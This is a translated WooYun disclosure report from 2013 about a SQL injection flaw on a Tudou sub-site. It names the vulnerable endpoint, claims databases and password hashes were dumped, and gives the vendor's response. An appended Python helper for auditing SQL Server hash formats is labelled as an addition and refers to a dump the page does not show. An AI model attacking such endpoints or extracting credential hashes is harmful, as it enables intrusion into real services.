
Vulnerability summary (followers: 24)

Defect ID: wooyun-2013-035667

Title: SQL injection vulnerability on a Tudou sub-site (multiple databases already dumped)

Vendor: Tudou (土豆网)

Author: Hxai11

Submitted: 2013-08-30 12:13

Fix deadline: 2013-10-14 12:13

Published: 2013-10-14 12:13

Vulnerability type: SQL injection

Severity: Medium

Self-assessed Rank: 10

Status: confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2013-08-30: details sent to the vendor, awaiting vendor handling
2013-08-31: vendor confirmed; details disclosed to the vendor only
2013-09-10: details disclosed to core white hats and domain experts
2013-09-20: details disclosed to regular white hats
2013-09-30: details disclosed to intern white hats
2013-10-14: details disclosed to the public

Brief description:

The injection monster is here!

Detailed description:

Injection URL:
http://whitevitality.tudou.com/usercontrols/uc_videosingle.aspx?store_id=5401country=l06&type=M&class=M04



database management system users password hashes:

Proof of vulnerability:

database management system users password hashes:

Fix recommendation:

Guard against injection.

Copyright notice: when reposting, please credit the source Hxai11@WooYun
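The hash dump above is printed in the SQL Server password_hash layout (2-byte header, 4-byte salt, digest). As an added example, not part of the original report, the following audit helper parses that layout and flags logins still stored under the legacy 0x0100 SHA-1 scheme, which is what a defender would check after a finding like this. The sample rows are constructed, not the values from the report.

```python
"""Audit SQL Server login password hashes by format version (added example)."""
import hashlib
from dataclasses import dataclass

# Header value -> (scheme name, digest length in bytes). Both schemes use a 4-byte salt.
HASH_FORMATS = {
    0x0100: ("SHA-1 (legacy, SQL Server 2000-2008)", 20),
    0x0200: ("SHA-512 (SQL Server 2012+)", 64),
}


@dataclass
class MssqlHash:
    login: str
    version: int
    salt: bytes
    digest: bytes

    @property
    def scheme(self) -> str:
        return HASH_FORMATS[self.version][0]

    @property
    def legacy(self) -> bool:
        return self.version == 0x0100


def parse_mssql_hash(login: str, value: str) -> MssqlHash:
    """Split a '0x...' password_hash into header, 4-byte salt and digest; reject malformed input."""
    if not value.lower().startswith("0x"):
        raise ValueError(f"{login}: hash must be hex with 0x prefix")
    raw = bytes.fromhex(value[2:])
    version = int.from_bytes(raw[:2], "big")
    if version not in HASH_FORMATS:
        raise ValueError(f"{login}: unknown hash header 0x{version:04x}")
    expected = 2 + 4 + HASH_FORMATS[version][1]
    if len(raw) != expected:
        raise ValueError(f"{login}: expected {expected} bytes, got {len(raw)}")
    return MssqlHash(login, version, raw[2:6], raw[6:])


def audit_logins(rows):
    """Return the login names whose stored hash still uses the legacy SHA-1 scheme."""
    return [h.login for h in (parse_mssql_hash(name, val) for name, val in rows) if h.legacy]


def _constructed_hash(version: int, salt: bytes, digest_len: int) -> str:
    """Build a constructed sample value with a valid layout (digest bytes are arbitrary)."""
    digest = hashlib.sha512(salt + b"constructed-sample").digest()[:digest_len]
    return "0x" + (version.to_bytes(2, "big") + salt + digest).hex()


# Constructed rows in the shape of sys.sql_logins (name, password_hash).
SAMPLE_ROWS = [
    ("sa", _constructed_hash(0x0100, b"\xde\xad\xbe\xef", 20)),
    ("app_svc", _constructed_hash(0x0200, b"\x01\x02\x03\x04", 64)),
]
```

Run `audit_logins(SAMPLE_ROWS)` against the real `name, password_hash` columns of `sys.sql_logins` to list accounts that need a password reset under the current hash scheme.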


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 5

Confirmed: 2013-08-31 13:36

Vendor reply:

A previous cooperative project; already handled, thanks.

Latest status:

None yet


Vulnerability rating:

Comments

  1. 2013-08-30 16:40 | 鬼魅羊羔 ( regular white hat | Rank:299 vulnerabilities:42 | (#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵...)

    @Tudou the water-meter inspector is coming~~